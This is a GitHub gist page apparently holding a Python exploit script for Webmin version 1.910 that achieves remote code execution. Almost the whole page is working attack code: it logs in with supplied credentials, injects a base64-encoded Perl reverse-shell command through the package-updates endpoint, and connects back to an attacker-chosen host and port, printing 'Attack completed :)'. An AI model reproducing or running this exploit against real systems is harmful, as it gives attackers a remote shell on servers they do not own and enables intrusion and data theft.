Created
March 14, 2020 20:02
-
-
Save AzraelSec/028f0b6c9370f55456c9d2cce3e56a3c to your computer and use it in GitHub Desktop.
This is a simple exploit for version 1.910 of Webmin service that leads to Remote Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from requests import post | |
from urllib import quote | |
from base64 import b64encode | |
from requests.packages.urllib3 import disable_warnings | |
from urllib3.exceptions import InsecureRequestWarning | |
USER = 'USER' | |
PASS = 'PASSWORD' | |
RHOST = 'REMOTE_IP' | |
RPORT = 'REMOTE_PORT' | |
LHOST = 'YOUR_IP' | |
LPORT = 'YOUR_PORT' | |
SSL = True | |
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT); | |
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"') | |
def base_url(): | |
return '{}://{}:{}/'.format(('https' if SSL else 'http'), RHOST, RPORT) | |
def login(): | |
params = {'user':USER, 'pass':PASS} | |
cookies = dict(testing='1', redirect='1', sid='x') | |
response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False) | |
return response.cookies['sid'] | |
def deliver_payload(sid): | |
data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED) | |
cookies = {'sid':sid} | |
headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())} | |
try: | |
response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False) | |
except KeyboardInterrupt: | |
pass | |
def banner(): | |
print " __ __ _ _ __ ___ __ ___ " | |
print " \ \ / / | | (_) /_ | / _ \/_ | / _ \ " | |
print " \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |" | |
print " \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |" | |
print " \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |" | |
print " \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ " | |
print " " | |
print " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n" | |
if __name__ == '__main__': | |
banner() | |
print 'Connecting to {}'.format(base_url()) | |
disable_warnings(category=InsecureRequestWarning) | |
session_cookie = login() | |
print 'Cookies forged: {}'.format(session_cookie) | |
print 'Attacking using this payload: {}'.format(PAYLOAD) | |
deliver_payload(session_cookie) | |
print 'Attack completed :)' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment